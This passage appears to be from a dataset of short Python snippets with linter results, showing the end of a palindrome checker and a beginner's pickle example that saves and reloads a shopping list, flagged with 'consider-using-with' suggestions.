11
12 if is_palindrome(something):
13     print("Yes, this is a palindrome")
14 else:
15     print("This is not a palindrome")
| Clean Code: No Issues Detected
|
1 import pickle
2
3 # the name of the file where we will store the object
4 shoplistfile = 'shoplist.data'
5
6 # the shopping list
7 shoplist = ['apple', 'mango', 'carrot']
8
9 # write to the file
10 f = open(shoplistfile, 'wb')
11
12 pickle.dump(shoplist, f)
13 f.close()
14
15 del shoplist # release the shoplist variable
16
17 # read back from storage
18 f = open(shoplistfile, 'rb')
19 storedlist = pickle.load(f)
20 f.close()
21 print(storedlist)
| 10 - refactor: consider-using-with
18 - refactor: consider-using-with
|